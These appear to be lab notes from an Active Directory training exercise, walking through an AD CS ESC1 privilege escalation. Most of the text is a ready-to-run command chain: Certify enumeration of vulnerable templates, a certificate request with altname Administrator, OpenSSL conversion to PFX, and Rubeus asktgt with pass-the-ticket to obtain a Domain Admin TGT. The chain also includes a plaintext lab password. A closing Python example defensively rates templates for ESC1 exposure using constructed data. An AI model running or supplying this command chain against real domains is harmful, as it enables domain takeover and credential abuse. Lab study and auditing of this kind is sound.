Checking if the forest is using CAs

Certify.exe find cas

Now finding certificate templates where the enrollee can supply the subject (ESC1)

Certify.exe find /enrolleesuppliessubject

Logging in as pawadmin

Rubeus.exe asktgt /user:pawadmin /domain:us.techcorp.local /certificate:pawadmin.pfx /password:SecretPass@123 /nowrap /ptt

Now Abusing The CA

C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

The certificate is saved as a cert.pem file

Now converting the PEM file to a PFX file

C:\AD\Tools\openssl\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx

Now let's request a TGT (asktgt) using the certificate

.\Rubeus.exe asktgt /user:Administrator /domain:us.techcorp.local /certificate:DA.pfx /password:SecretPass@123 /nowrap /ptt
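
As a defender-side view of the ESC1 condition enumerated above, the following added example (not part of the original notes) rates certificate templates against the settings that make a template abusable. The LDAP attribute names and flag bits are the standard AD CS ones; the `enroll_principals` field and every template record are constructed sample data.

```python
# Added example: rate certificate templates against the ESC1 conditions.
# Attribute names are those of AD pKICertificateTemplate objects; the
# "enroll_principals" field and all template records are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # bit in msPKI-Enrollment-Flag (CA manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
BROAD = {"domain users", "authenticated users", "domain computers", "everyone"}

def esc1_rating(tpl):
    """Return 'high', 'review' or None for one template record."""
    ekus = tpl.get("pKIExtendedKeyUsage", [])
    exposed = (
        tpl.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        and (not ekus or AUTH_EKUS & set(ekus))    # empty EKU list = any purpose
        and not (tpl.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS)
        and tpl.get("msPKI-RA-Signature", 0) == 0  # no authorized signature needed
    )
    if not exposed:
        return None
    principals = {p.split("\\")[-1].lower() for p in tpl.get("enroll_principals", [])}
    # A broad group exposes the template to every account. A narrow enrollee
    # list still lets each enrollee name any subject, so it needs review.
    return "high" if principals & BROAD else "review"

def audit(templates):
    ratings = {t["name"]: esc1_rating(t) for t in templates}
    return {name: r for name, r in ratings.items() if r}

SAMPLE_TEMPLATES = [  # constructed records, not taken from a real forest
    {"name": "SampleUserAuth", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0x20,
     "msPKI-RA-Signature": 0, "enroll_principals": ["SAMPLE\\Domain Users"]},
    {"name": "SamplePawOperators", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "enroll_principals": ["SAMPLE\\paw-operators"]},
    {"name": "SampleApprovalRequired", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0x22,
     "msPKI-RA-Signature": 0, "enroll_principals": ["SAMPLE\\Domain Users"]},
]

if __name__ == "__main__":
    for name, rating in audit(SAMPLE_TEMPLATES).items():
        print(f"{rating:6} {name}")
```

In practice the records would come from an LDAP export of the Certificate Templates container, with enrollment rights resolved from each template's ACL.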